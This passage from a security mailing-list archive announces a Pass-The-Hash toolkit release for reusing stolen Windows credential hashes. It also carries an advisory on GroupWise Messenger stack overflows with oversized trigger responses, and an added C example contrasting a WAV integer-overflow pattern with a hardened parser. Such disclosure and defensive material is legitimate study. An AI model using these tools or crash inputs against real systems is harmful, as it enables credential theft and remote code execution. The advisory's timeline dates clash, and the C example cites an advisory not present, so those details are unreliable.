Subject: [Full-disclosure] Release of Pass-The-Hash Toolkit v1.4
Message-ID:

Source Code:
http://oss.coresecurity.com/pshtoolkit/release/1.4/pshtoolkit_v1.4-src.tgz

Win32 Binaries:
http://oss.coresecurity.com/pshtoolkit/release/1.4/pshtoolkit_v1.4.tgz

Documentation/info:
http://oss.coresecurity.com/projects/pshtoolkit.htm
http://oss.coresecurity.com/pshtoolkit/doc/index.html
http://hexale.blogspot.com
http://www.hexale.org/forums

What's new?: (http://oss.coresecurity.com/pshtoolkit/release/1.4/WHATSNEW)

*Support for XP SP 3 for whosthere/iam (whosthere-alt/iam-alt work on
 xp sp3 without requiring any update)

*New -t switch for whosthere/whosthere-alt: establishes interval used by
 the -i switch (by default 2 seconds).

*New -a switch for whosthere/iam: specify addresses to use. Format:
 ADDCREDENTIAL_ADDR:ENCRYPTMEMORY_ADDR:FEEDBACK_ADDR:DESKEY_ADDR:LOGONSESSIONLIST_ADDR:LOGONSESSIONLIST_COUNT_ADDR
 (WARNING!: if you use the wrong values the system may crash)

 The idea is that, if you find yourself in a version of Windows where
 whosthere/iam don't work (and iam-alt/whosthere-alt don't work either),
 you can run LSASRV.DLL through IDA, run the PASSTHEHASH.IDC script
 included in the Pass-The-Hash toolkit, and use the addresses found by
 the script with the -a switch. This basically allows you to specify
 addresses at runtime to whosthere without the need to recompile the tool.
*New -r switch for iam/iam-alt: Create a new logon session and run a
 command with the specified credentials (e.g.: -r cmd.exe)

*genhash now outputs hashes using the LM HASH:NT HASH format

*several bugfixes and stuff

From noreply at infobyte.com.ar Wed Jul 2 22:13:01 2008
From: noreply at infobyte.com.ar ([ISR] - Infobyte Security Research)
Date: Wed, 2 Jul 2008 18:13:01 -0300
Subject: [Full-disclosure] Novell GroupWise Messenger Client (GWIM) Remote Stack Overflow
Message-ID: <200807021813.01654.noreply@infobyte.com.ar>

||
|| [ISR]
|| Infobyte Security Research
|| www.infobyte.com.ar
|| 07.02.2008
||

.:: SUMMARY

Novell GroupWise Messenger Client (GWIM) Remote Stack Overflow

Version: 2.0. It is suspected that all previous versions of GroupWise
Messenger Client are vulnerable.

.:: BACKGROUND

Novell GroupWise Messenger is a corporate instant messaging product that
uses Novell eDirectory as its user database.

More info: http://www.novell.com

.:: VULNERABILITY VIDEO DEMO

http://www.infobyte.com.ar/demo/ISR_groupwise_messenger.html

.:: POC

ISR-groupwisemsn.pl, simple fake GroupWise msn server.
http://www.infobyte.com.ar/developments.html

.:: DESCRIPTION

Issue 1:
--------

This issue is due to a failure of the application to securely parse the
server's response. The application server works similarly to the HTTP
protocol, default TCP port 8300.
The server always responds to the client's request with something like
this:

"
HTTP/1.0 200 \r
Date: xxx, xx xxx xxxx xx:xx:xx GMT\r
Pragma: no-cache\r
Cache-Control: no-cache\r
\r
%VALUES%
\0\0\0
\0\24\0\0\0NM_A_SZ_RESULT_CODE\0\2\0\0\x000\0
\0\27\0\0\0NM_A_SZ_TRANSACTION_ID\0\2\0\0\x001\0\0
"

If the client application receives a server response to any request like
the following, a stack overflow occurs:

"
HTTP/1.0 200 \r
Date: xxx, xx xxx xxxx xx:xx:xx GMT\r
Pragma: no-cache\r
Cache-Control: no-cache\r
\r
%VALUES%
\0\0\0
\0\24\0\0\0NM_A_SZ_RESULT_CODE\0\2\0\0\x000\0
\0\27\0\0\0NM_A_SZ_TRANSACTION_ID\0\2\0\0\x001\0\0" + "AAAAAAAAAA...." x 5000

Issue 2:
--------

We found another stack overflow regarding the client's popup alerts. When
you receive a message from another user, the server sends a string like
this to the client:

"l\0\0\x001\0\0\0CN=XXXX,OU=XX,OU=XXXX,OU=XX,OU=XX,O=INFOBYTEXX\0'\0\0\0
[871F8247-4B110000-0A01C80A-6C20-0100]\0\1\0\0\0\xE4\0\0\0
{\\rtf1\\fbidis\\ansi\\ansicpg1252\\deff0\\deflang3082
{\\fonttbl{\\f0\\fswiss\\fprq2\\fcharset0 fontname;}}\r\n
{\\colortbl;\\red0\\green0\\blue0;}\r\n
\\viewkind4\\uc1\\pard\\ltrpar\\li50\\ri50\\cf1\\f0\\fs20 MESSAGE\\par\r\n}\r\n\0";

If a client receives a string like this but with "A" x 5000 added
anywhere in the string, you have another stack overflow.

.:: IMPACT

Both vulnerabilities permit arbitrary code execution.

.:: VENDOR RESPONSE

Vendor advisory:
http://support.novell.com/docs/Readmes/InfoDocument/patchbuilder/readme_5026700.html

.:: CVE INFORMATION

Id: CVE-2008-2703, CVE-2008-2704
Web: http://cve.mitre.org

.:: DISCLOSURE TIMELINE

01/12/2008 Initial vendor notification
01/13/2007 Initial vendor response notify research
06/10/2007 Coordinated public disclosure

.:: CREDIT

Francisco Amato is credited with discovering this vulnerability.
famato][at][infobyte][dot][com][dot][ar

.:: LEGAL NOTICES

Copyright (c) 2007 by [ISR] Infobyte Security Research.
Permission to redistribute this alert electronically is granted as long
as it is not edited in any way unless authorized by Infobyte Security
Research Response. Reprinting the whole or part of this alert in any
medium other than electronically requires permission from infobyte com ar

Disclaimer

The information in the advisory is believed to be accurate at the time
of publishing based on currently available information. Use of the
information constitutes acceptance for use in an AS IS condition. There
are no warranties with regard to this information. Neither the author
nor the publisher accepts any liability for any direct, indirect, or
consequential loss or damage arising from use of, or reliance on, this
information.
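The integer-overflow pattern behind the Secunia VLC WAV advisory earlier in this digest (a 32-bit "fmt" chunk size read from the file and fed into an allocation-size computation), shown as an added example written for this page; it is not VLC's code, and since the advisory does not show wav.c, the `size + 2` slack computation, the 4096-byte cap and the two sample files are constructed assumptions. It puts the wrapping computation beside a hardened chunk reader that checks every file-supplied size before using it.

```c
/* Added example, not VLC's code: a RIFF/WAV "fmt " chunk reader showing the
 * integer-overflow pattern the Secunia advisory describes, and a hardened form.
 * The advisory does not show wav.c, so the "size + 2" slack computation, the
 * 4096-byte cap and the sample files below are constructed assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The fields a demuxer needs from the "fmt " chunk. */
typedef struct {
    uint16_t format_tag;
    uint16_t channels;
    uint32_t sample_rate;
    uint16_t bits_per_sample;
} wav_fmt;

enum { WAV_OK = 0, WAV_ERR_TRUNCATED = -1, WAV_ERR_BAD_SIZE = -2, WAV_ERR_NO_FMT = -3 };

/* RIFF stores every integer little-endian. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Unsafe pattern: "chunk size plus a little slack" computed in 32 bits.
 * For 0xFFFFFFFF this wraps to 1, so a 1-byte buffer would receive a copy
 * of 0xFFFFFFFF bytes: the heap overflow. Only the arithmetic is shown;
 * nothing is allocated or copied here. */
uint32_t unsafe_alloc_size(uint32_t chunk_size) {
    return chunk_size + 2u;  /* wraps modulo 2^32 */
}

#define FMT_MIN_SIZE 16u    /* WAVEFORMAT + bits per sample: smallest legal PCM fmt */
#define FMT_MAX_SIZE 4096u  /* assumed sanity cap; no real fmt chunk comes close */

/* Hardened: walk the RIFF chunks in buf[0..len) and parse the first "fmt ".
 * Every size read from the file is checked against the bytes actually present
 * and against a semantic bound before it is used in arithmetic or a copy. */
int parse_wav_fmt(const uint8_t *buf, size_t len, wav_fmt *out) {
    if (len < 12 || memcmp(buf, "RIFF", 4) != 0 || memcmp(buf + 8, "WAVE", 4) != 0)
        return WAV_ERR_TRUNCATED;
    size_t pos = 12;
    while (pos + 8 <= len) {
        const uint8_t *id = buf + pos;
        uint32_t size = rd32(buf + pos + 4);
        pos += 8;
        if (size > len - pos)            /* claims more bytes than the file holds */
            return WAV_ERR_BAD_SIZE;
        if (memcmp(id, "fmt ", 4) == 0) {
            if (size < FMT_MIN_SIZE || size > FMT_MAX_SIZE)
                return WAV_ERR_BAD_SIZE; /* only past this point is size + 2 safe */
            out->format_tag      = rd16(buf + pos);
            out->channels        = rd16(buf + pos + 2);
            out->sample_rate     = rd32(buf + pos + 4);
            out->bits_per_sample = rd16(buf + pos + 14);
            return WAV_OK;
        }
        pos += size + (size & 1u);       /* RIFF chunks are padded to even length */
    }
    return WAV_ERR_NO_FMT;
}

/* Constructed sample: valid header, 16-byte PCM fmt (stereo, 44100 Hz,
 * 16-bit), empty data chunk. */
static const uint8_t good_wav[] = {
    'R','I','F','F', 0x24,0x00,0x00,0x00, 'W','A','V','E',
    'f','m','t',' ', 0x10,0x00,0x00,0x00,
    0x01,0x00, 0x02,0x00, 0x44,0xAC,0x00,0x00, 0x10,0xB1,0x02,0x00, 0x04,0x00, 0x10,0x00,
    'd','a','t','a', 0x00,0x00,0x00,0x00
};
/* Constructed hostile sample: identical except the fmt size field is 0xFFFFFFFF. */
static const uint8_t evil_wav[] = {
    'R','I','F','F', 0x24,0x00,0x00,0x00, 'W','A','V','E',
    'f','m','t',' ', 0xFF,0xFF,0xFF,0xFF,
    0x01,0x00, 0x02,0x00, 0x44,0xAC,0x00,0x00, 0x10,0xB1,0x02,0x00, 0x04,0x00, 0x10,0x00,
    'd','a','t','a', 0x00,0x00,0x00,0x00
};

/* Convenience wrapper: channel count on success, negative error code otherwise. */
int wav_channels(const uint8_t *buf, size_t len) {
    wav_fmt f;
    int rc = parse_wav_fmt(buf, len, &f);
    return rc == WAV_OK ? (int)f.channels : rc;
}

int main(void) {
    printf("good: channels=%d\n", wav_channels(good_wav, sizeof good_wav));
    printf("evil: rc=%d (unsafe alloc size would be %u bytes)\n",
           wav_channels(evil_wav, sizeof evil_wav), unsafe_alloc_size(0xFFFFFFFFu));
    return 0;
}
```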